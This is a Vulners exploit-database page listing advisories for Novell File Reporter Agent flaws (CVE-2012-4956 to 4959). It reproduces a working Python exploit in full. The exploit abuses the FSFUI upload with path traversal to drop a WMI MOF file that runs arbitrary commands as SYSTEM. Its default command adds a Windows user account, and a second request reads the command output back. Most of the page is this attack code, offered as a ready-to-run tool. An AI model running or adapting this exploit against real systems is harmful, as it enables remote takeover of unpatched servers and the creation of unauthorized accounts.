Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
 | NFR Agent FSFUI Record File Upload Remote Command Execution | 17 Nov 201200:00 | – | zdt |
| Novell File Reporter Agent XML Parsing Remote Code Execution | 12 Dec 201200:00 | – | zdt |
 | CVE-2012-4959 | 19 Nov 201200:00 | – | circl |
 | Novell File Reporter FSFUI File Upload (CVE-2012-4959) | 10 Dec 201200:00 | – | checkpoint_advisories |
 | CVE-2012-4956 | 18 Nov 201219:00 | – | cve |
| CVE-2012-4958 | 18 Nov 201219:00 | – | cve |
| CVE-2012-4959 | 18 Nov 201219:00 | – | cve |
 | CVE-2012-4956 | 18 Nov 201219:00 | – | cvelist |
| CVE-2012-4957 | 18 Nov 201219:00 | – | cvelist |
| CVE-2012-4958 | 18 Nov 201219:00 | – | cvelist |
10
import httplib, md5, sys
def message_MD5(arg):
v = "SRS" + arg + "SERVER"
m = md5.new(v)
return m.hexdigest()
def genMof(command="net user abysssec 123456 /add"):
vbs = ""
vbs += "\"Set objShell = CreateObject(\\\"WScript.Shell\\\")\\n\"\n"
vbs += "\"objShell.Run \\\"cmd.exe /C "
vbs += command
vbs += "\\\"\""
mof = """
#pragma namespace ("\\\\\\\\.\\\\root\\\\subscription")
#pragma deleteclass("MyASEventConsumer", nofail)
#pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail)
#pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail)
class MyASEventConsumer
{
[key]string Name;
};
instance of ActiveScriptEventConsumer as $CONSUMER
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
SCRIPT;
};
instance of __EventFilter as $FILTER
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Name = "EF";
Query = "SELECT * FROM __InstanceCreationEvent"
" WHERE TargetInstance.__class = \\"MyASEventConsumer\\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $BINDING
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Filter = $FILTER;
Consumer = $CONSUMER;
};
instance of MyASEventConsumer
{
Name = "Trigger";
};
""".replace('SCRIPT',vbs)
return mof
def main(argv=None):
if argv is None:
argv = sys.argv
if len(argv) != 2:
print "[!] USAGE : mof \"<command]>\""
return
msg = "<ROOT><NAME>FSFUI</NAME><UICMD>130</UICMD><TOKEN><FILE>../../../../../../Windows/system32/wbem/mof/command.mof</FILE></TOKEN><![CDATA["
msg += genMof(argv[1] + "> C:/Windows/System32/info.dat")
msg += "]]></ROOT>"
body = message_MD5(msg).upper() + msg
headers = {"Content-type": "text/xml"}
conn = httplib.HTTPSConnection("192.168.10.20:3037")
conn.request("POST", "/SRS/CMD",body, headers)
response = conn.getresponse()
print "\n...Command Executed ..."
print response.status, response.reason
print response.read()
msg = "<ROOT><NAME>FSFUI</NAME><UICMD>126</UICMD><TOKEN><FILE>../../../../../../WINDOWS/system32/info.dat</FILE></TOKEN></ROOT>"
body = message_MD5(msg).upper() + msg
conn.request("POST", "/SRS/CMD",body, headers)
response = conn.getresponse()
conn.request("POST", "/SRS/CMD",body, headers)
response = conn.getresponse()
print "\n...Getting result ..."
print response.status, response.reason
print response.read()
conn.close()
if __name__ == "__main__":
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jan 2015 11:35Current
0.1Low risk
Vulners AI Score0.1
EPSS0.71194